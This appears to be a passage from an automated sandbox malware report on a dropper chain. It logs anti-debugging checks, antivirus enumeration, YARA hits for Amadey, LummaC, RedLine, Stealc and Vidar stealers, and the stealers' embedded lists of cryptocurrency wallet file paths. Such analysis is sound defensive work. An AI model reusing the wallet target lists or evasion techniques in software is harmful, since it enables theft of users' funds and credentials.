Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

Code function: 10_2_04D9048F rdtsc

10_2_04D9048F

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CCCAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6CCCAC62

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_0088652B mov eax, dword ptr fs:[00000030h]		10_2_0088652B
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_0088A302 mov eax, dword ptr fs:[00000030h]		10_2_0088A302

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CCCAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6CCCAC62

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe "C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe "C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe "C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe"

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CD14760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

9_2_6CD14760

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CBF1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

9_2_6CBF1C30

Source: cab7dbccac.exe, 0000001A.00000002.2526452012.0000000000275000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: ,Program Manager
Source: d40ec5ca11.exe, 00000019.00000002.2425506049.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: W#Program Manager
Source: ab13ed0cb0.exe, 0000001B.00000002.2526454168.000000000055B000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: ]Program Manager
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, 0000000A.00000002.1558004548.0000000000A7F000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 0000000C.00000002.1601211820.00000000007DF000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: $?NProgram Manager
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882410159.000000000085C000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: TProgram Manager

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CCCAE71 cpuid

9_2_6CCCAE71

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CCCA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

9_2_6CCCA8DC

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CC18390 NSS_GetVersion,

9_2_6CC18390

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: procmon.exe
Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: wireshark.exe
Source: L8ChrKrbqV.exe, 00000000.00000003.1423527819.0000000001134000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Windows Defender\MsMpeng.exe
Source: L8ChrKrbqV.exe, 00000000.00000003.1423592172.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1398249851.0000000001113000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1406788213.00000000059C0000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1398083017.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001113000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2504546748.000000000545A000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2532156050.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000002.2544735148.0000000005463000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2510370250.0000000005463000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2505297531.0000000005461000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.skotes.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1557809992.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2166199712.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1553717755.0000000000851000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1600338181.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1556622656.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1600329800.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1511295315.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: d40ec5ca11.exe PID: 2916, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: L8ChrKrbqV.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cab7dbccac.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ab13ed0cb0.exe PID: 7852, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.1882078107.0000000000491000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1483989893.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe PID: 7188, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: L8ChrKrbqV.exe, 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: L8ChrKrbqV.exe, 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: L8ChrKrbqV.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: L8ChrKrbqV.exe, 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.json*
Source: L8ChrKrbqV.exe, 00000000.00000003.1396923044.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"WaDx
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: L8ChrKrbqV.exe, 00000000.00000003.1396923044.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}ln
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: L8ChrKrbqV.exe, 00000000.00000003.1396923044.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",
